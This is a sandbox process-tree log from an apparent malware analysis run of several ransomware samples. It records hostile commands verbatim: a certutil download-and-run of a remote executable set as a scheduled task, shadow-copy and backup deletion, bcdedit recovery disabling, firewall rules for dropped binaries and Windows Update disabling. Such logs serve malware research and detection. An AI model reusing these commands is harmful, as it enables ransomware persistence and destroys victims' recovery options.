                                  • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-bcc2e28f1351fa4d89b4f7cf96abe57a4d723a411540cff37ed5e912b6740553.exe
                                    HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-bcc2e28f1351fa4d89b4f7cf96abe57a4d723a411540cff37ed5e912b6740553.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:640
                                  • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Blocker.gen-2a161ebe85ca77dbfea4ddb26b40acf95d4b58466c1a0262d449481669cd6b1c.exe
                                    HEUR-Trojan-Ransom.Win32.Blocker.gen-2a161ebe85ca77dbfea4ddb26b40acf95d4b58466c1a0262d449481669cd6b1c.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:4844
                                    • C:\Users\Admin\AppData\Local\Temp\is-4O9I8.tmp\HEUR-Trojan-Ransom.Win32.Blocker.gen-2a161ebe85ca77dbfea4ddb26b40acf95d4b58466c1a0262d449481669cd6b1c.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-4O9I8.tmp\HEUR-Trojan-Ransom.Win32.Blocker.gen-2a161ebe85ca77dbfea4ddb26b40acf95d4b58466c1a0262d449481669cd6b1c.tmp" /SL5="$60216,1073306,56832,C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Blocker.gen-2a161ebe85ca77dbfea4ddb26b40acf95d4b58466c1a0262d449481669cd6b1c.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:1956
                                  • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Blocker.vho-2511d92821ab8016b549b74b4eae14a94f47ef9de3f94840f5e80d880329b79f.exe
                                    HEUR-Trojan-Ransom.Win32.Blocker.vho-2511d92821ab8016b549b74b4eae14a94f47ef9de3f94840f5e80d880329b79f.exe
                                    3⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:4180
                                    • C:\Users\Admin\Desktop\00384\tpvpyme.exe
                                      "C:\Users\Admin\Desktop\00384\tpvpyme.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2192
                                      • C:\Windows\splwow64.exe
                                        C:\Windows\splwow64.exe 12288
                                        5⤵
                                          PID:1264
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00384\USB_Habilitar.bat" "
                                          5⤵
                                            PID:6380
                                            • C:\Windows\SysWOW64\regedit.exe
                                              REGEDIT /S "C:\Users\Admin\Desktop\00384\USB_habilitar.reg
                                              6⤵
                                              • Runs .reg file with regedit
                                              PID:4908
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\00384\windowsUpdate.bat" "
                                            5⤵
                                              PID:5440
                                              • C:\Windows\SysWOW64\regedit.exe
                                                REGEDIT /S "C:\Users\Admin\Desktop\00384\windowsUpdate.reg
                                                6⤵
                                                • Runs .reg file with regedit
                                                PID:5408
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                              5⤵
                                                PID:6316
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update /v AUOptions /t REG_DWORD /d 1 /f
                                                5⤵
                                                  PID:6336
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sc config wuauserv start= disabled
                                                  5⤵
                                                    PID:7136
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config wuauserv start= disabled
                                                      6⤵
                                                      • Launches sc.exe
                                                      PID:6804
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c net stop wuauserv
                                                    5⤵
                                                      PID:3572
                                                      • C:\Windows\SysWOW64\net.exe
                                                        net stop wuauserv
                                                        6⤵
                                                          PID:6320
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 stop wuauserv
                                                            7⤵
                                                              PID:6976
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
                                                          5⤵
                                                            PID:5684
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
                                                              6⤵
                                                                PID:776
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
                                                              5⤵
                                                                PID:5492
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
                                                                  6⤵
                                                                    PID:8184
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
                                                                      7⤵
                                                                        PID:3836
                                                              • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Generic-d1827184ad7bce4ce6c03b2f1c7fd72b84d9659ff2b68e65abcacf21df56b66f.exe
                                                                HEUR-Trojan-Ransom.Win32.Generic-d1827184ad7bce4ce6c03b2f1c7fd72b84d9659ff2b68e65abcacf21df56b66f.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:3352
                                                              • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Sodin.vho-ab0b2130063e9e9f0a58b0b18dba104eac8eccee4bdc22a341c28c6eaef40d4e.exe
                                                                HEUR-Trojan-Ransom.Win32.Sodin.vho-ab0b2130063e9e9f0a58b0b18dba104eac8eccee4bdc22a341c28c6eaef40d4e.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5060
                                                                • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Sodin.vho-ab0b2130063e9e9f0a58b0b18dba104eac8eccee4bdc22a341c28c6eaef40d4e.exe
                                                                  "C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Sodin.vho-ab0b2130063e9e9f0a58b0b18dba104eac8eccee4bdc22a341c28c6eaef40d4e.exe"
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:5776
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                    5⤵
                                                                      PID:6080
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                        6⤵
                                                                        • Modifies Windows Firewall
                                                                        PID:5980
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\3c7cde6da34c\3c7cde6da34c\3c7cde6da34c.exe" enable=yes"
                                                                      5⤵
                                                                        PID:6492
                                                                        • C:\Windows\system32\netsh.exe
                                                                          netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\3c7cde6da34c\3c7cde6da34c\3c7cde6da34c.exe" enable=yes
                                                                          6⤵
                                                                          • Modifies Windows Firewall
                                                                          PID:1732
                                                                      • C:\Windows\rss\csrss.exe
                                                                        C:\Windows\rss\csrss.exe ""
                                                                        5⤵
                                                                          PID:7776
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                            6⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:6212
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                                                            6⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:6576
                                                                          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                                                            6⤵
                                                                              PID:7332
                                                                            • C:\Windows\system32\bcdedit.exe
                                                                              C:\Windows\Sysnative\bcdedit.exe /v
                                                                              6⤵
                                                                              • Modifies boot configuration data using bcdedit
                                                                              PID:5728
                                                                      • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Spora.gen-dbccb179b38bd0493f594f5a4bda348c397a70421d2d164144a6911863a478a1.exe
                                                                        HEUR-Trojan-Ransom.Win32.Spora.gen-dbccb179b38bd0493f594f5a4bda348c397a70421d2d164144a6911863a478a1.exe
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4160
                                                                        • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Spora.gen-dbccb179b38bd0493f594f5a4bda348c397a70421d2d164144a6911863a478a1.exe
                                                                          "C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Spora.gen-dbccb179b38bd0493f594f5a4bda348c397a70421d2d164144a6911863a478a1.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:6812
                                                                          • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Spora.gen-dbccb179b38bd0493f594f5a4bda348c397a70421d2d164144a6911863a478a1.exe
                                                                            "C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.Win32.Spora.gen-dbccb179b38bd0493f594f5a4bda348c397a70421d2d164144a6911863a478a1.exe"
                                                                            5⤵
                                                                              PID:6672
                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Avaddon.bl-c7c9f8f68348fbd26aae20c9ccb1aefd1cfce63897efa4c64abe7ac480253259.exe
                                                                          Trojan-Ransom.Win32.Avaddon.bl-c7c9f8f68348fbd26aae20c9ccb1aefd1cfce63897efa4c64abe7ac480253259.exe
                                                                          3⤵
                                                                          • UAC bypass
                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                          • Checks BIOS information in registry
                                                                          • Executes dropped EXE
                                                                          • Checks whether UAC is enabled
                                                                          • Drops desktop.ini file(s)
                                                                          • Enumerates connected drives
                                                                          • System Location Discovery: System Language Discovery
                                                                          • System policy modification
                                                                          PID:5076
                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                            wmic.exe SHADOWCOPY /nointeractive
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2516
                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                            wmic.exe SHADOWCOPY /nointeractive
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3568
                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                            wmic.exe SHADOWCOPY /nointeractive
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2860
                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Blocker.hnwj-4a35c6475e5cb4f00788baf8c5518d1c76138fbf6f01414c86c8551b3a0c445a.exe
                                                                          Trojan-Ransom.Win32.Blocker.hnwj-4a35c6475e5cb4f00788baf8c5518d1c76138fbf6f01414c86c8551b3a0c445a.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Impair Defenses: Safe Mode Boot
                                                                          • Adds Run key to start application
                                                                          • Drops file in Windows directory
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4936
                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Blocker.hrft-fd6fae46ffe394b11ad4613e6a6ae389ec1e5a0be83e956421ec7a2d4234f374.exe
                                                                          Trojan-Ransom.Win32.Blocker.hrft-fd6fae46ffe394b11ad4613e6a6ae389ec1e5a0be83e956421ec7a2d4234f374.exe
                                                                          3⤵
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4448
                                                                          • C:\Users\Admin\AppData\Local\Temp\FB_E27B.tmp.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\FB_E27B.tmp.exe"
                                                                            4⤵
                                                                            • Modifies WinLogon for persistence
                                                                            • UAC bypass
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            • System policy modification
                                                                            PID:2072
                                                                          • C:\Users\Admin\AppData\Local\Temp\FB_E4ED.tmp.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\FB_E4ED.tmp.exe"
                                                                            4⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3544
                                                                            • C:\Users\Admin\AppData\Roaming\dllhost.exe
                                                                              "C:\Users\Admin\AppData\Roaming\dllhost.exe"
                                                                              5⤵
                                                                              • Drops startup file
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:4704
                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Blocker.mpky-294ba6e9b866afeea187e58fbb48381ce740b137dfd2efad0a3a88a584f0f32e.exe
                                                                          Trojan-Ransom.Win32.Blocker.mpky-294ba6e9b866afeea187e58fbb48381ce740b137dfd2efad0a3a88a584f0f32e.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3360
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-RJTF4.tmp\Trojan-Ransom.Win32.Blocker.mpky-294ba6e9b866afeea187e58fbb48381ce740b137dfd2efad0a3a88a584f0f32e.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-RJTF4.tmp\Trojan-Ransom.Win32.Blocker.mpky-294ba6e9b866afeea187e58fbb48381ce740b137dfd2efad0a3a88a584f0f32e.tmp" /SL5="$303D8,8089733,721408,C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Blocker.mpky-294ba6e9b866afeea187e58fbb48381ce740b137dfd2efad0a3a88a584f0f32e.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2144
                                                                            • C:\Program Files (x86)\Advanced JPG to PDF Free\AdvancedJPGtoPDFFree.exe
                                                                              "C:\Program Files (x86)\Advanced JPG to PDF Free\AdvancedJPGtoPDFFree.exe"
                                                                              5⤵
                                                                                PID:2504
                                                                                • C:\Program Files (x86)\Advanced JPG to PDF Free\goup.exe
                                                                                  "C:\Program Files (x86)\Advanced JPG to PDF Free\goup.exe"
                                                                                  6⤵
                                                                                    PID:5088
                                                                                    • C:\Users\Admin\AppData\Roaming\Advanced JPG to PDF Free New Version Available\AdvancedJPGtoPDFFree.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Advanced JPG to PDF Free New Version Available\AdvancedJPGtoPDFFree.exe"
                                                                                      7⤵
                                                                                        PID:5572
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-IE7RV.tmp\AdvancedJPGtoPDFFree.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-IE7RV.tmp\AdvancedJPGtoPDFFree.tmp" /SL5="$F02F0,7008795,140800,C:\Users\Admin\AppData\Roaming\Advanced JPG to PDF Free New Version Available\AdvancedJPGtoPDFFree.exe"
                                                                                          8⤵
                                                                                            PID:5520
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-LAMOE.tmp\rk_setup.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-LAMOE.tmp\rk_setup.exe" -c: 3024 -lang: 1 -tpi: SCI_AdvancedJPGtoPDFFree_NEW
                                                                                              9⤵
                                                                                                PID:4420
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-UMGFB.tmp\rk_setup.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-UMGFB.tmp\rk_setup.tmp" /SL5="$1302D0,2094150,780800,C:\Users\Admin\AppData\Local\Temp\is-LAMOE.tmp\rk_setup.exe" -c: 3024 -lang: 1 -tpi: SCI_AdvancedJPGtoPDFFree_NEW
                                                                                                  10⤵
                                                                                                    PID:7628
                                                                                                • C:\Program Files (x86)\Advanced JPG to PDF Free\AdvancedJPGtoPDFFree.exe
                                                                                                  "C:\Program Files (x86)\Advanced JPG to PDF Free\AdvancedJPGtoPDFFree.exe"
                                                                                                  9⤵
                                                                                                    PID:6544
                                                                                                    • C:\Program Files (x86)\Advanced JPG to PDF Free\goup.exe
                                                                                                      "C:\Program Files (x86)\Advanced JPG to PDF Free\goup.exe"
                                                                                                      10⤵
                                                                                                        PID:7932
                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Crypmod.acap-2b287ee26c60c7fb1a507fff432e9a1ab60f570aeffe205ab60ee6437237976e.exe
                                                                                          Trojan-Ransom.Win32.Crypmod.acap-2b287ee26c60c7fb1a507fff432e9a1ab60f570aeffe205ab60ee6437237976e.exe
                                                                                          3⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Enumerates connected drives
                                                                                          • Sets desktop wallpaper using registry
                                                                                          • Drops file in Program Files directory
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Checks processor information in registry
                                                                                          PID:2404
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:5940
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1476
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:7008
                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Crypmod.acbg-c61275dc217382afc9b41065e26bab842df544b820292d2616276d54bdaf611f.exe
                                                                                          Trojan-Ransom.Win32.Crypmod.acbg-c61275dc217382afc9b41065e26bab842df544b820292d2616276d54bdaf611f.exe
                                                                                          3⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Enumerates connected drives
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Checks processor information in registry
                                                                                          PID:4000
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Crypmod.acbg-c61275dc217382afc9b41065e26bab842df544b820292d2616276d54bdaf611f.exe" /f /q
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4968
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              timeout -c 5
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:1396
                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Crypren.agkf-3b8ab56fc962cd038cd696f9deb900da130649e91b2285b59157454c85a067bd.exe
                                                                                          Trojan-Ransom.Win32.Crypren.agkf-3b8ab56fc962cd038cd696f9deb900da130649e91b2285b59157454c85a067bd.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4128
                                                                                        • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Cryptor.dhe-983f1f3faf8f3736f5bb25a6185651ab7faa978210e22481b0ffc46443125e70.exe
                                                                                          Trojan-Ransom.Win32.Cryptor.dhe-983f1f3faf8f3736f5bb25a6185651ab7faa978210e22481b0ffc46443125e70.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:3512
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\SysWOW64\cmd.exe"
                                                                                            4⤵
                                                                                              PID:4976
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\SysWOW64\cmd.exe" n4976
                                                                                                5⤵
                                                                                                  PID:6320
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe"
                                                                                                  5⤵
                                                                                                    PID:7448
                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                      vssadmin delete shadows /all /quiet
                                                                                                      6⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:2268
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic shadowcopy delete
                                                                                                      6⤵
                                                                                                        PID:6772
                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                        bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                        6⤵
                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                        PID:1832
                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                        bcdedit /set {default} recoveryenabled no
                                                                                                        6⤵
                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                        PID:7968
                                                                                                      • C:\Windows\system32\wbadmin.exe
                                                                                                        wbadmin delete catalog -quiet
                                                                                                        6⤵
                                                                                                        • Deletes backup catalog
                                                                                                        PID:7224
                                                                                                • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Foreign.olxe-fdd9b8b9bb1d65cda4675bf1510b682f405c257127a7f5d3daa97643eeeab879.exe
                                                                                                  Trojan-Ransom.Win32.Foreign.olxe-fdd9b8b9bb1d65cda4675bf1510b682f405c257127a7f5d3daa97643eeeab879.exe
                                                                                                  3⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3964
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Boom.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Boom.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4052
                                                                                                • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.GandCrypt.eqk-c90a35ddde8c186a017a4d2e78a79b346e25ef4258ff777724fb6ecf6b95e9ee.exe
                                                                                                  Trojan-Ransom.Win32.GandCrypt.eqk-c90a35ddde8c186a017a4d2e78a79b346e25ef4258ff777724fb6ecf6b95e9ee.exe
                                                                                                  3⤵
                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Executes dropped EXE
                                                                                                  • Identifies Wine through registry keys
                                                                                                  • Enumerates connected drives
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Checks processor information in registry
                                                                                                  PID:3532
                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                    "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                                                                                    4⤵
                                                                                                      PID:508
                                                                                                  • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Rack.izx-a451f8c1d04fb03830addc63f30791944ffe9727132a9cde286ddf0871814c71.exe
                                                                                                    Trojan-Ransom.Win32.Rack.izx-a451f8c1d04fb03830addc63f30791944ffe9727132a9cde286ddf0871814c71.exe
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2964
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 408
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:5952
                                                                                                  • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sfile.c-d3bf17ac4db4f367cfed8f40f92670066ca97e98d210b043e4d3b89a4971bbdf.exe
                                                                                                    Trojan-Ransom.Win32.Sfile.c-d3bf17ac4db4f367cfed8f40f92670066ca97e98d210b043e4d3b89a4971bbdf.exe
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Drops file in Program Files directory
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2636
                                                                                                  • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.lg-7fc70136a6451dc0ac77f01552538be8db2c912ed00162337f1c77e244e0c44d.exe
                                                                                                    Trojan-Ransom.Win32.Sodin.lg-7fc70136a6451dc0ac77f01552538be8db2c912ed00162337f1c77e244e0c44d.exe
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    PID:2516
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 388
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:5784
                                                                                                  • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.xh-8f2ab18f883ef0d2a9c46c63baf95a8b2b489388dbe5f8fa1b68248bc23fa598.exe
                                                                                                    Trojan-Ransom.Win32.Sodin.xh-8f2ab18f883ef0d2a9c46c63baf95a8b2b489388dbe5f8fa1b68248bc23fa598.exe
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:4936
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 380
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:5644
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 384
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:5212
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 384
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:5772
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 696
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:5632
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 744
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:5992
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 740
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:6752
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 740
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:5388
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 760
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:3700
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 788
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:6268
                                                                                                    • C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.xh-8f2ab18f883ef0d2a9c46c63baf95a8b2b489388dbe5f8fa1b68248bc23fa598.exe
                                                                                                      "C:\Users\Admin\Desktop\00384\Trojan-Ransom.Win32.Sodin.xh-8f2ab18f883ef0d2a9c46c63baf95a8b2b489388dbe5f8fa1b68248bc23fa598.exe"
                                                                                                      4⤵
                                                                                                        PID:2072
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
